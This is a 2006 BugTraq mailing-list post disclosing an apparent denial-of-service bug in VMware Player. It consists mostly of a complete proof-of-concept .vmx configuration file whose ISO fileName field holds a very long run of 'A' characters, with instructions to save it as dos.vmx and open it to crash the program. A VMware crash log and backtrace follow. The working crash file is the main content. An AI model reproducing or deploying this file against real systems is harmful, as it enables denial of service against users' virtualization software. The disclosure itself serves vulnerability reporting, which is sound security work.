BugTraq
Vm ware 0day dos exploit by n00b. Jun 18 2006 01:02PM
co296 aol com (2 replies)
Credit's : n00b

email : co296 (at) aol (dot) com [email concealed]

Erm was wondering if you could take a close look at this it is a 0day dos exploit by me i found tonight in vmware i have even debug for you guy's to take a look at.I hope you guy's will put it up after checking through it.Ok the first thing is vmware use's.vmx file's as like config file's

the problem as follows in vmx file's we have to change the name of our file.iso

Following line's ide1:0.fileName =

but if wee change it to the following it will cause a d0s and vmware will have to be shut down and rebooted.The file has an overly long file name as follows

example.<.Expliotation.>

#Edit line below to change ISO to boot from

ide1:0.fileName = AAAA etc. and alot more see dubug for exact amount. .iso

Save as

dos.vmx

Open with vmare player and you will see it crash..I have provided the following proof of concept available here

[code]

config.version = "8"

virtualHW.version = "4"

displayName = "credit's to n00b for find this vouln"

annotation = "Live CD ISO http://www.irongeek.com"

guestinfo.vmware.product.long = "credit's to n00b for find this vouln"

guestinfo.vmware.product.url = "http://www.millw0rm.com"

guestinfo.vmware.product.short = "LCDI"

guestinfo.vmware.product.version.major = "1"

guestinfo.vmware.product.version.minor = "0"

guestinfo.vmware.product.version.revision = "0"

guestinfo.vmware.product.version.type = "release"

guestinfo.vmware.product.class = "virtual machine"

guestinfo.vmware.product.build = "1.0.0rc8-20051212"

uuid.action = "create"

guestOS = "winxppro"

#####

# Memory

#####

memsize = "128"

# memsize = "256"

# memsize = "512"

# memsize = "768"

#

# Alternative larger memory allocations

#####

# USB

#####

usb.present = "TRUE"

#####

# Floppy

#####

floppy0.present = "FALSE"

#####

# IDE Storage

#####

ide1:0.present = "TRUE"

#Edit line below to change ISO to boot from

ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"

ide1:0.deviceType = "cdrom-image"

ide1:0.startConnected = "TRUE"

ide1:0.autodetect = "TRUE"

#####

# Network

#####

ethernet0.present = "TRUE"

ethernet0.connectionType = "nat"

# ethernet0.connectionType = "bridged"

#

# Switch these two to enable "Bridged" vs. "NAT"

#####

# Sound

#####

sound.present = "TRUE"

sound.virtualDev = "es1371"

sound.autoDetect = "TRUE"

sound.fileName = "-1"

#####

# Misc.

#

# (normal) high

priority.grabbed = "high"

tools.syncTime = "TRUE"

workingDir = "."

#

# (16) 32 64

sched.mem.pShare.checkRate = "32"

#

# (32) 64 128

sched.mem.pshare.scanRate = "64"

#

# Higher resolution lockout, adjust values to exceed 800x600

svga.maxWidth = "800"

svga.maxHeight = "600"

#

# (F) T

isolation.tools.dnd.disable = "FALSE"

#

# (F) T

isolation.tools.hgfs.disable = "FALSE"

#

# (F) T

isolation.tools.copy.disable = "FALSE"

#

# (F) T

isolation.tools.paste.disable = "FALSE"

#

# (T) F

logging = "TRUE"

#

#

# (F) T

log.append = "FALSE"

#

# (3) number of older files kept

log.keepOld = "1"

#

# (0) microseconds

keyboard.typematicMinDelay = 1000000

uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"

uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"

ethernet0.addressType = "generated"

ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"

ethernet0.generatedAddressOffset = "0"

checkpoint.vmState = "live-cd-iso.vmss"

tools.remindInstall = "TRUE"

[/code]

Open with note pad and save as dos.vmx

the following debug info is available..

Thnx to n00b lo0l....It's so late .

[code]

vmx| [msg.cdromImage.nofile] File "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:/ob/bora-19317/bo
ra/lib/string/str.c:192 Buffer too small 0x430f6f

Mar 15 11:19:18: vmx| Backtrace:

Mar 15 11:19:18: vmx| ----Backtrace using dbghelp.dll----

Mar 15 11:19:18: vmx| Module path: C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe

Mar 15 11:19:18: vmx| Module directory: C:\Program Files\VMware\VMware Player\binMar 15 11:19:18: vmx| backtrace[00] ebp 0x0012f224 eip 0x00436ada params 0x0043ac30 0000000000 0x0012f648 0x00413d5d [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00035ada] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[01] ebp 0x0012f234 eip 0x0043b366 params 0000000000 0x0012f248 0x0abb4258 0x6f2f3a43 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0003a366] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[02] ebp 0x0012f648 eip 0x00413d5d params 0x0067bbfc 0x0067bc1c 0x000000c0 0x00430f6f [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00012d5d] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[03] ebp 0x0012f668 eip 0x0041ae4e params 0x00724daa 0x0abb4258 0x00001000 0x08ef7e88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00019e4e] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[04] ebp 0x0012f688 eip 0x00430f6f params 0000000000 0x00000002 0x0abb4258 0x08ef5fe0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0002ff6f] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[05] ebp 0x0012f6b4 eip 0x0040e499 params 0000000000 0x00000002 0x08ef5fe0 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000d499] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[06] ebp 0x0012f6d8 eip 0x0040f778 params 0x00000002 0x0abb4258 0x08ef5fe0 0x000000c9 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000e778] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[07] ebp 0x0012f780 eip 0x00416389 params 0000000000 0x00000002 0x006766a0 0x0012f7a8 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015389] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[08] ebp 0x0012f798 eip 0x00416426 params 0x00000002 0x006766a0 0x08e84170 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015426] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[09] ebp 0x0012f7bc eip 0x0040ffd7 params 0x0012f7e0 0x005af633 0000000000 0x08f0d800 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000efd7] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[10] ebp 0x0012f7c4 eip 0x005af9f8 params 0000000000 0x08f0d800 0x08e84780 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae9f8] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[11] ebp 0x0012f7e0 eip 0x005af633 params 0x08e84780 0x08f0d800 0x00000143 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae633] (no symbol information)

